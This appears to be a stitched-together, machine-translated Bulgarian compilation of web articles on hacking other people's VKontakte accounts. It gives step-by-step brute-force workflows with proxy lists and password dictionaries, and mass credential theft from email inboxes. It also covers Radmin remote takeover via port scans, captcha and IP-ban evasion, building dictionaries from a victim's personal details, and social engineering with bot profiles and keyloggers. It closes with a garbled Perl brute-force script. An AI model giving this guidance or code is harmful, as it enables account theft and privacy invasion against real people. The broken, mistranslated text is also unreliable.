Да, съществува. Най-общо казано има много такива програми.
И ние сме против такива програми.
Но тъй като има известно търсене на такива програми, нека да разгледаме кои от тях са „относително“ легални и кои е по-добре да не се използват изобщо.
Първоначално, от самото създаване на VKontakte, имаше например програми като приложения за груба сила.
Такива програми се занимават с търсене на всички съществуващи пароли. За това се използват както конвенционални алгоритми стъпка по стъпка, така и така наречените алгоритми. Rainbow таблици, в които стойностите са разпръснати на случаен принцип според най-доброто разпределение - както е предвидено от авторите най-новите програми, случайното разпределение може да намали времето за търсене на парола, тъй като търсенето няма да започне от самото начало, а на случаен принцип и средно пътят до желаната буква ще бъде по-кратък.
Изобщо не препоръчваме използването на програми за груба сила.Има различни програми за хакване на VKontakte и затова е по-добре да не използвате грубо „взлом“ на страница; освен това самият потребител може да заподозре нещо и да изтрие страницата, да създаде друга или да промени адреса й. и освен това Администрацията на VK ще ви блокира по IP и може да започне съдебно производство за атака на сървъри за вход и нарушаване на тяхната стабилност, както и опит за проникване в кореспонденцията на някой друг.
Така че програмите за хакване на VKontakte с груба сила са незаконни. Какви други има?
Като цяло винаги ще имате време да изтеглите безплатно хакерската програма VKontakte. Наистина са много. Нека да разгледаме какви законни начини има за проникване в страницата на някой друг.
На първо място, това са приложения. Приложенията имат богата информация за потребителя. Обикновено потребителите не четат подканите, които се показват, преди да стартират приложението. И там приложението получава пълен достъп до личните данни, списъка с приятели, стената и т.н. Личните съобщения, разбира се, остават неизвестни за приложението, но Познавайки колосалното количество лична информация, скрита преди това зад настройките за поверителност, можете да извършвате измами в областта на социалното инженерство и да се занимавате с „примамване“ на информация за потребителя от най-близките му приятели.
Това обаче не е съвсем законно - могат да възникнат проблеми поради факта, че ако потребителят Ако се досети, че това е приложението, което е изтекло данните, тогава той, разбира се, ще подаде жалба срещу него и приложението ще бъде блокирано.Като цяло методът е добър, но бързо попада под съмнение. Да и правенето на приложение все още е караница.
Да продължим.
Къде мога нормално да изтегля програма за хакване на страници на VKontakte, която ще бъде законна?
Първо, нека бъдем ясни – задоволяваме се само със социалното инженерство. По принцип, ако се използва правилно, социалното инженерство ще ни помогне да извлечем всички необходими данни от даден потребител, без да хакваме страницата му. Въпреки че можете също да получите пълен достъп до страницата.
И така, кои са там? социални програмиза хакване на VKontakte, който може да бъде изтеглен безплатно?
На първо място, заслужава да се отбележи ботът Brobot.
Използването му за хакване, разбира се, е доста странен метод за контролиране на тази програма, но по принцип, Функционалността там е необходима и достатъчна за хакване.
Можем да „настроим“ бота срещу самия потребител, срещу неговите приятели, използвайки възможностите за добавяне на приятели и лична кореспонденция. Нека свържем бот III за разговори, като го настроим на най-приятелския тон. И след това вече можете да се възползвате от предимствата, като научите много интересни неща за потребителя в историята на кореспонденцията, която Brobot е запазил.
След това можете да изпратите на потребителя, напр. keylogger и улавя какво пише на други потребители– всъщност след това няма да се налага да изтегляте специални програми за хакване на VKontakte. Ще бъде достатъчно само да наблюдавате потребителя. Можете обаче да се справите и без keylogger!
Как могат да ни помогнат програми за хакване на VKontakte като Brobot?
Първо, нека да определим какво Brobot не хаква страници. Всичките ни дейности са абсолютно законни, никой не може да ни съди, никой не може да ни блокира - всичко е абсолютно честно (дотолкова, доколкото имаме нужда).
Ние просто всъщност създаваме няколко страници (По-добре е незабавно да купите неограничено, това гарантирано ще увеличи обема на извлечената информация) и от тях вече комуникираме с потребителя, който ни позволява да разберем отношението му към различни личности, както и да получим портрет на него, неговите приятели, роднини и така нататък - и това е, по същество, това, от което се нуждаем.И в бъдеще можете да извършвате още по-интересни и сложни действия и тук всичко зависи от вашите желания и въображение.
Програмата Brobot ще стане ваш добър помощник, а екипът за поддръжка на Brobot, който е на разположение почти денонощно, ще отговори на всички ваши технически въпроси.
Brute force (произлиза от английската фраза: груба сила) е вид хакерска атака - начин за хакване на акаунти в компютърни системи, платежни/банкови услуги и на уебсайтове чрез автоматизиран избор на комбинации за парола и вход.
Грубата сила се основава на едноименния математически метод (груба сила), при който правилното решение - крайно число или символна комбинация - се намира чрез търсене в различни опции. Всъщност всяка стойност от даден набор от потенциални отговори (решения) се проверява за коректност.
Как работи грубата сила
Хакер пише специална програма за отгатване на пароли или използва готово решение от колегите си. Може да бъде насочен към конкретна имейл услуга, уебсайт, социална мрежа (т.е. предназначен е за хакване на определен ресурс). След това се извършва подготовка за хакване. Състои се от следните стъпки:
- Изготвяне на прокси списък
За да се скрие истинският IP адрес на компютъра, от който ще бъде извършена атаката, и за да се предотврати блокиране от сайта, където акаунтът трябва да бъде хакнат, се конфигурира интернет връзка чрез прокси сървър.
Търсенето на прокси адреси/портове се извършва в Proxy Grabber. Тази помощна програма независимо извлича всички данни за свързване към междинни сървъри от сайтове, които предоставят прокси (те са посочени в списъка). С други думи, събира се прокси.
Получената база данни се записва в отделен текстов файл. След това всички адреси на сървъри, съдържащи се в него, се проверяват за работоспособност в програмата за проверка на прокси. Доста често програмите, предназначени за автоматизирано прокси копаене, съчетават функциите на грабер и проверка.
В резултат на това получавате готов списък с прокси сървъри под формата на списък с IP/порт, записан в txt файл. (Ще ви трябва, когато настройвате програмата за груба сила).
- Търсене на бази за Brute
Трябва да свържете речник с brute force - определен набор от комбинации от пароли и влизания - които той ще замени във формата за влизане. Той, подобно на прокси списъка, има формата на списък в обикновен текстов файл(.txt). Речниците, известни още като бази данни, се разпространяват чрез хакерски форуми, уебсайтове и услуги за хостване на файлове. По-опитните „занаятчии“ ги създават сами и ги предоставят на всички срещу заплащане. Колкото по-голяма е базата (брой комбинации, влизания, акаунти), толкова по-добре (за хакера) - толкова по-голяма е вероятността за успех на хакването.
- Настройване на груба сила
Прокси списъкът се зарежда; програмата за избор автоматично ще промени проксито, така че уеб сървърът да не открие атаката и съответно източника (хоста) на атаката.
Свързан е речник на комбинации парола/вход. Броят на нишките е зададен - колко комбинации грубата сила ще проверява едновременно. Мощен компютърс висока скоростИнтернет може уверено да се справи със 120-200 потока (това е оптимална стойност). Скоростта на брута директно зависи от тази настройка. Например, ако зададете само 10 нишки, изборът ще бъде много бавен.
- Бягаща груба сила
Програмата записва успешни опити за хакване: записва свързаните акаунти (парола/вход) във файл. Продължителността на процедурата по подбор варира от няколко часа до няколко дни. Това обаче не винаги е ефективно поради високата криптографска сила на данните за влизане или прилагането на други защитни мерки от нападателя.
Видове груба сила
Лично хакване
Търсене на конкретен акаунт – в социална мрежа, в имейл услуга и др. Чрез или в процеса виртуална комуникациянападателят пита жертвата за вход за достъп до уебсайт. След това той разбива паролата с груба сила: използва груба сила, за да посочи адреса на уеб ресурса и полученото влизане и свързва речника.
Шансовете за такъв хак са малки, например, в сравнение със същата XSS атака. Може да бъде успешно, ако собственикът на акаунта използва парола от 6-7 знака с проста комбинация от символи. В противен случай „решаването“ на по-стабилни варианти от 12, 15, 20 букви, цифри и специални знаци ще отнеме години - десетки и стотици години, въз основа на изчисленията на формулата за математическо търсене.
Брут/чек
База данни с влизания/пароли от пощенските кутии на един пощенска услуга(например mail.ru) или различни. И прокси списък - за маскиране на възела (тъй като имейл уеб услугите бързо откриват атака въз основа на множество заявки от един IP адрес).
Опциите на грубияна показват списък с ключови думи (обикновено имена на сайтове) - ориентири, по които той ще търси информация за вход в хакнати пощенски кутии (например: steampowered, worldoftanks, 4game, VK). Или конкретен интернет ресурс.
Когато се регистрира в онлайн игра, социална мрежа или форум, потребителят, както се очаква, посочва своя имейл ( пощенска кутия). Уеб услугата изпраща съобщение до посочения адрес с информация за вход и връзка за потвърждение на регистрацията. Именно тези писма се търсят с груба сила, за да се извлекат данни за вход и пароли от тях.
Щракнете върху “СТАРТ” и програмата за кракване започва груба сила. Работи по следния алгоритъм:
- Зарежда данните за вход/парола за имейла от базата данни.
- Проверява достъпа или „проверява“ (автоматично влизане): ако е възможно да влезете в акаунта, той добавя такъв в колоната за добро (това означава, че е намерен друг работен имейл) и започва да го преглежда (вижте следните точки ); ако няма достъп, той е посочен като лош.
- Във всички „звукови сигнали“ (отворени имейли) грубата сила сканира писмата според заявката, посочена от хакера - тоест търси вход/пароли за посочените сайтове и платежни системи.
- Когато се намерят необходимите данни, той ги копира и записва в отделен файл.
Така се получава масово „отвличане“ на акаунти – от десетки до стотици. Нападателят се разпорежда с получените „трофеи” по свое усмотрение - продажба, обмен, събиране на данни, кражба на пари.
Дистанционно хакване на компютър
За получаване се използва груба сила във връзка с други хакерски инструменти отдалечен достъпкъм защитения с парола компютър на жертвата чрез интернет канал.
Този тип атака се състои от следните етапи:
- Извършва се търсене на IP мрежи, в които ще се извърши атаката на потребителските компютри. Диапазоните на адресите се вземат от специални бази данни или чрез специални програми, като IP Geo. В него можете да изберете IP мрежи за конкретен район, регион и дори град.
- Избраните IP диапазони и речници за избор се задават в настройките на Lamescan brute force (или негов аналог), предназначени за отдалечено грубо влизане/парола. Веднъж стартиран, Lamescan прави следното:
- осъществява връзка към всяко IP от даден диапазон;
- след установяване на връзка, той се опитва да се свърже с хоста (PC) през порт 4899 (но може да има и други опции);
- ако портът е отворен: опитва се да получи достъп до системата, когато бъде поискана парола, извършва отгатване; ако е успешен, той запазва IP адреса на хоста (компютъра) и информацията за влизане в своята база данни.
- Хакерът стартира помощната програма Radmin, предназначена за управление на отдалечени компютри. Задава мрежовите координати на жертвата (IP, потребителско име и парола) и получава пълен контрол върху системата - работния плот (показва се визуално на дисплея на компютъра на атакуващия), файлови директории, настройки.
Програми за Брут
HASHCAT
За 2020 г. една от най-мощните програми за брут. Използва повече от 200 алгоритъма за груба сила. Широко използван за отгатване на WPA/WPA2 пароли, както и пароли за MS Office, PDF, 7-Zip, RAR, TrueCrypt документи.
Класическа груба сила, една от първите. Въпреки това, той не губи своята актуалност и се конкурира с нови решения. Има бърз алгоритъм за груба сила и поддържа всички основни интернет протоколи - TCP/IP, POP3, HTTP и др. Може да фалшифицира бисквитки. Изчиства речника и генерира независимо пароли.
Мощен брут контролер. Оборудван с разширен арсенал от функции за работа с бази данни (проверка, сортиране по домейн). Поддържа различни видовепрокси, проверява тяхната функционалност. Сканира писма в пощенските кутии въз основа на настройки като дата, ключова дума, адрес, непрочетени съобщения. Може да изтегля писма от Mail.ru и Yandex.
Brut VK - софтуер, който избира автоматичен режимпароли за всички акаунти във VKontakte. Пълното име на такива приложения е Bruteforce. Те са предназначени да хакнат профилите на конкретен потребител в сайт на социална мрежа. Има доста такива програми, но повечето са абсолютно неефективни. Въпреки това, с правилната помощна програма ще получите всяка скрита информация. Функционалността тук е доста проста и хакването е лесно.
Какво е Brute "VK"
Brute е специален софтуер, който избира пароли за влизане чрез въвеждане на различни комбинации от букви и цифри, имейли така нататък. Ако зададете сложна парола, програмата ще отнеме много време, за да я познае и в крайна сметка може да не успее да изпълни задачата. Резултатът от грубата сила до голяма степен се влияе от това колко мощна е техниката, използвана за хакване, и колко стабилна е интернет връзката. Процесът на хакване може да продължи няколко минути или цял ден. Ако зададете парола с висока сложност, например: RKGJH4hKn2, тогава специален софтуер може изобщо да не успее да я разбие.
Какво е база
За да работи Bruteforce, той трябва да има данни; Ако тя няма избор на кодове, тя няма да направи нищо. Базата е набор от различни кодови комбинации и влизания. Ако списъкът е огромен, тогава рано или късно ще хакнете акаунта си с помощта на приложението. Комбинациите са с най-малка дължина от три букви и цифри. Най-голямата дължина достига 16 знака. Зависи от версията софтуер. Изборът на кода започва с буквата “А” и завършва с последната буква от азбуката. Буквите могат да бъдат руски или английски. Това е основното полезна информацияотносно основата.
Кому трябва
Всички потребители имат свои собствени причини за хакване на VK профили на други хора. Някои хора правят това за забавление, други искат да прочетат кореспонденцията. Освен това някои хора искат да изпращат невалидни съобщения. Едно нещо, което трябва да имате предвид е, че брутът е незаконен. Винаги ще трябва да отговаряте за кражба. По-добре е да не правите това. Всеки хакнат акаунт може лесно да бъде възстановен. Особено ако по време на регистрацията му е предоставена реална информация. По-трудно е с профили, създадени бързо и съдържащи неверни данни, но хакерите обикновено не се нуждаят от тях.
Те крадат информация от страницата в социална мрежа„VK“ само ако представлява интерес за някого. Хакерите обикновено продават откраднати акаунти на клиенти в големи количества. След това могат да ги препродадат отново на собствениците, ако има такива важна информация. Хакерите винаги се опитват да се защитят и използват прокси сървър. С негова помощ никой няма да ги забележи, тъй като IP адресът ще бъде непознат.
Ако искате да се предпазите от нападатели, направете паролата си дълга и сложна. Не използвайте своя собствена сметка„VK“ в мрежа, където други хора имат достъп до компютъра. Освен това не трябва да запазвате паролата си в браузъра; тя може лесно да бъде прихваната. Ако сте получили SMS на телефона си за влизане във вашия VK профил, но не сте направили това, незабавно променете паролата си. Опитайте се да направите това възможно най-бързо. По този начин ще се предпазите от загуба на важни лични данни.
Brute force - груба сила, хакване с груба сила
В статията "" беше казано, че хакването на VK с груба сила (програма) е невъзможно.
Това не е съвсем вярно, все още има вратички...
По-долу е работещ скрипт, но първо...
В долната част на статията има безплатна програма за генериране на брутален речник и списък с „топ пароли за изсмукване“
Правя предварителна резервация, че ние говорим заза класическата „груба сила“ без никакви PBKDF2 алгоритми, без парсване на ша хеширане, защото на ежедневно ниво това е непосилна задача.
В интернет циркулират много програми „за хакване на VK с груба сила (груба сила)“
Кое да избера? Кое ще помогне (без да ми навреди)?
- Никакви
Всеки VK акаунт изисква персонален подход и шаблонните програми от мрежата са глупости, измама, глупости.
Сега ще разберете защо. Математическа част накратко.
Минималната дължина на паролата за VK е 6 знака.
Паролата трябва да съдържа:
числа(0-9 - 10 опции),
писма(a-z - 26 на латиница),
главни букви(A-Z - също 26)
Общо за всеки символ - 10+26+26=62 (!) опции, така че броят на комбинациите за:
Парола от 6 знака - 56 800 235 584 (56,8 милиарда)
Парола от 7 символа - 3,521,614,606,208 (3,5 трилиона)
Парола от 8 знака - 218 340 105 584 896 (218 трилиона)
9-символна парола -13 537 086 546 263 600 (HZ както се нарича))))
Не знаем дължината на паролата, така че ще трябва да форсираме диапазон от поне 6-8 знака
Общо: 6+7+8 знака = 221 918 520 426 688 (222 трилиона) опции
Да приемем, че имате доста добър компютър, но възниква въпросът - колко заявки към VK сървъра може да направи?
Каква е скоростта на търсене на домашен компютър?
Нека направим сметката. За това ще отворим команден ред(Старт - стандартно - команден ред или стартиране на процеса cmd.exe)
Въведете командата и получете отговора на сървъра
„Отговор от ..... време 134ms“ (това е за мен, вашето време може да е различно)
Ping time е времето, необходимо на сигнала да премине от нашата машина до сървъра и обратно
Има 1000 милисекунди (ms) в една секунда, така че
Грубата скорост от вашата машина (заявки/сек) ще бъде = 1000/време за реакция
В моя случай 1000/134ms = 7,4 заявки (пароли) в секунда
Колко време ще отнеме търсенето на пароли за VK?
Нека ви напомня, че изпробваме 221 918 520 426 688 (222 трилиона) опции за пароли.
Следователно, за да разберем колко ще разбием паролата на VK чрез груба сила, разделяме сумата на скоростта, т.е.
221918520426688 пароли / 7,4 пароли в секунда = 29737081737176sec = 495618028953 min = 8260300483 часа = 344179187 дни = 942957 години
Заключение:истинска програма за хакване на VK може да намери парола чрез груба сила за 94 хиляди години.
Въпрос: Какво ще кажете за видеоклиповете в YouTube, в които чудодейни програми грубо форсират VK страница за няколко минути/часа?
Отговарям: Това е измама, създадена с цел да зарази компютъра ви, за да открадне вашите собствени данни. Нито повече – нито по-малко.
Можете значително да ускорите процеса на търсене!
За да направите това ви трябва:
1. Увеличете изчислителната мощност. Например, заразете 1 000 000 компютъра на други хора и едновременно груба сила VK от всички тях (това е смешно)
2. Съкратете речника Brute до, например, няколко хиляди (на принципа на социалното инженерство)
Как да направите речник на Brute?
1. Използване на химикалки в програмата notepad (notepad.exe)
2. Програма „генератор на брут“ (връзка в долната част на статията)
Попълваме този брутален речник с реални опции.
Истинските са тези, които са поне по някакъв начин свързани с лицето, което е хакнато:
-телефони(той, неговите роднини, приятели)
Пример- числа с +7s, 8s, без 8s - рядко се срещат
- рождени дати(той, неговите роднини, близки)
Пример- (същата дата) 010118, 01012018, 20180101, 180101 - среща се често
- Имена на любими хора
Пример- SashaMaria, MariaIvanova, SaNoMaIv - попада средно
Име на сайта (или фамилия) на различно оформление
Пример, ако напишете думата „vkontakte“ на руската клавиатура, ще получите „mlshtefleu“ - такава схема много често се среща на всички сайтове.
- Списъкът на Лохов с пароли за Брут(списък с най-често срещаните пароли в интернет - връзка в края на статията)
Колко време отнема написването на речник?Е, не съвсем - половин час е достатъчен. Кой каза, че ще бъде лесно?))
Да приемем, че имаме създаден брутален речник и работеща програма за избор на VK парола (или ръчно въвеждане с помощта на речник).
Възниква един важен проблем - системата за сигурност на сървъра.
Всъщност пречката му се крие във факта, че ако заявките са твърде чести, сървърът глупаво блокира (временно) вашия IP. Освен това, ако работите с VK чрез стандартна форма за въвеждане (HTML\FORM), след третия неуспешен опит VK ще ви помоли да въведете captcha.
IN стара версия VK може просто да премине към мобилната версия - m.vk.com, но сега мобилна версияняма такова нещо - през 2016 г. направиха един единствен адаптивен дизайн.
Как да заобиколите VKontakte captcha?
VK изисква въвеждане на captcha след 3 неуспешни опита (рестартирането на F5 не помага), но откъде знае това това си тиОпитвате ли се да влезете няколко пъти?
По IP
- чрез бисквитки, кеш и JavaScript
Няма проблеми с бисквитките, кеша и JavaScript - можете просто да ги деактивирате в настройките на браузъра си.
IP може да се промени чрез инсталиране на програма за промяна на IP - няма нищо сложно, има ги много в интернет (Google може да помогне)
Можете да използвате браузъра TOR (за тези, които не знаят, това е браузър за анонимно сърфиране в мрежата, той също променя IP номерата с всяка нова сесия, полезно нещо особено за тези, които сърфират или работят в SAR)
Но всички опити за груба сила са почти напълно анулирани от ГЕОЛОКАЦИЯТА.
VK сървърът помни къде (географски) е направено последното влизане.
И ако IP-то ти е от др селище, тогава (евентуално) ще се появи следното съобщение:
„Опитвате се да влезете под името Иван Иванов от необичайно място.“
За да потвърдите, че наистина сте собственик на страницата, моля, въведете всички липсващи цифри на телефонния номер, към който е свързана страницата.
Скрипт за груби уеб формуляри (като програма за хакване на VK)
важно!
На VK сървъра има скрипт, който следи честотата на изпращане на пакети, т.е. ако удряте със скорост N пъти/сек, автоматично ще бъдете изпратени в списъка за забрана на IP.
VK също използва GEO проследяване.
Без динамичен IP не бива да се опитвате да грубите, VPN може да помогне.
Лично аз смятам грубото форсиране на VK пароли за необещаващо, но за ценителите ще публикувам стар Perl скрипт, заимстван от 5p4x2knet a.k.a. Апокалиптично и малко поправено.
Скриптът работи с помощта на метода POST само в два параметъра - входи парола.
Ако данните за вход са известни (например телефонен номер), просто попълнете съответните полета със стойността, без да се позовавате на речника.
Скрити полета - captcha, скриптът няма да предава изображения, скрийте източника на заявките (себе си), както е описано по-горе.
Тук ще ни трябва разумният речник Brute, който съставихме в началото на статията. (да го наречем, например, brutal.txt )
Трябва ни и файл, от който нашата програма ще получава информация.
Програмата ще форсира всички скриптове, посочени в този файл.( info.txt). Ако има само един скрипт, можете да замените
Естествено, файлът за запис на резултатите ( резултат.txt)
така че
{
#свържете обекта
$usagent = LWP::UserAgent
#отворете файла с информация (ако не можем да го отворим, излезте);
# изхвърлете файла в масива @infa и го затворете. (ако има само един скрипт, можете веднага да го посочите)
отворено (INFA, ";
затвори (INFA);
#отворете речника Brute
отворено (BRUT, ";
затвори (BRUT);
#отваряне на файл с резултати (добавя се в края).
отворен(РЕЗУЛТАТ, ">>$ARGV");
#начало на цикъла
foreach $name (@infa)
{
#отделен URL, данни за вход, променливи и информация за грешка
($url, $login, $log_vr, $pwd_vr, $failed) = split(//, $name);
#покажи URL
печат "$url...n";
#започване на нов цикъл
foreach $brut (@brut)
{
#kill интервали и прекъсвания на редове
$pss =~ s/ //;
$pss =~ s/n//;
#свържете нов обект
$usagent = LWP::UserAgent->new();
#създаване на заявки.
$req = HTTP::Request->new(POST=>$url);
$req->content_type("application/x-www-form-urlencoded");
$req->content("$log_vr=$login&$pwd_vr=$pss");
#и изпращането му
$резултат = $usagent -> заявка($req);
#съхраняване на резултатите в променлива
$res = $result->content;
#ако не работи, се генерира съобщение за грешка
if($res!~ /$failed/i)
{
#изходно съобщение с парола; запис в резултатите;
print "brutword намерена. It isn$pssnn";
print RESULT "URL: $urlnLOGIN: $loginnBRUT: $pssnn";
#в противен случай изборът продължава
последно;
}
}
}
#затваряне на файла result.txt
затвори (РЕЗУЛТАТ);
